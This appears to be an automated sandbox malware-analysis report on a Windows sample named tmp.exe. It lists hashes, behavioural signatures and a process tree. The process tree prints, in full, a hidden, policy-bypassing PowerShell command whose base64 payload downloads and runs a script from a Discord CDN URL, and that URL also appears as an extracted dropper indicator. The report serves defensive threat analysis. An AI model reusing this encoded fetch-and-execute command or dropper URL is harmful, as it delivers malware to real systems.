Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
28-03-2023 12:12
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230220-en
windows10-2004-x64
6 signatures
150 seconds
General
-
Target
tmp.exe
-
Size
92KB
-
MD5
f0b2f2d5186ecb1df278892375e29171
-
SHA1
f1e2e1365ad3463a5685bd6ab8eeb581f50dd0ee
-
SHA256
03ac65cbbc897a705cfa15c74bba1adc773f88db724398db12d105d19ee8ee50
-
SHA512
41fa116f39afd6f4e7fc7bad821c0ce9fe0db268dab18a9e83db6ec3fe6c83099bf14f80441f0bf87a4d5590782a1ba9908d6c576d8c56e224a8c096aae07c0d
-
SSDEEP
1536:EjpxRYrm0MlPJFZyMzJdNHJGQ/l3pS+2ZyxDG/ONJctGVaIsWkBcd5ApB:EjF0M9bldNrpS+2ZyxDG//UVb58B
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://cdn.discordapp.com/attachments/1089906964944920650/1090020680885600276/6456234.ps1
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 1684 powershell.exe 5 1684 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1684 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
tmp.execmd.exedescription pid process target process PID 1964 wrote to memory of 1936 1964 tmp.exe cmd.exe PID 1964 wrote to memory of 1936 1964 tmp.exe cmd.exe PID 1964 wrote to memory of 1936 1964 tmp.exe cmd.exe PID 1964 wrote to memory of 1936 1964 tmp.exe cmd.exe PID 1936 wrote to memory of 1684 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1684 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1684 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1684 1936 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADgAOQA5ADAANgA5ADYANAA5ADQANAA5ADIAMAA2ADUAMAAvADEAMAA5ADAAMAAyADAANgA4ADAAOAA4ADUANgAwADAAMgA3ADYALwA2ADQANQA2ADIAMwA0AC4AcABzADEAJwApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADgAOQA5ADAANgA5ADYANAA5ADQANAA5ADIAMAA2ADUAMAAvADEAMAA5ADAAMAAyADAANgA4ADAAOAA4ADUANgAwADAAMgA3ADYALwA2ADQANQA2ADIAMwA0AC4AcABzADEAJwApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684